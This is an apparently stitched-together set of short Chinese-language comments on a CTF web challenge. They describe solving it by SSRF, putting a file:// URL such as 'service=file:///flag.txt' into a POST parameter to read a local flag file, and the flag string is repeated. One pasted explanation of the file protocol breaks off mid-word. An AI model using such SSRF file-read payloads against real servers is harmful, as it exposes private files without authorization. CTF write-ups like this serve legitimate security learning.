service=file:////flag.txt
属于典型的SSRF漏洞,利用file协议读取flag
服务器到底是怎么处理这个service的?是展示这个service指向的url的内容?
源码最下方看js代码,按照代码内容构建请求,利用service参数夹带私货。
shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf} service=file://127.0.0.1/flag.txt
file:///flag.txt
File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 2、格式:file://机器的IP地址/目录/文件,例如要打开D盘images文件夹中的111.png文件,那么可以在资源管理器或IE地址栏中键入file://D:/images/111.png 然后回车。 注:(1)对于本地机器,机器的IP地址可变成127.0.0.1或loca
SSRF,通过数据包访问/request,在POST传参service最后利用file协议读取flag
Half the truth is often a big lie: shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$
环境貌似不行了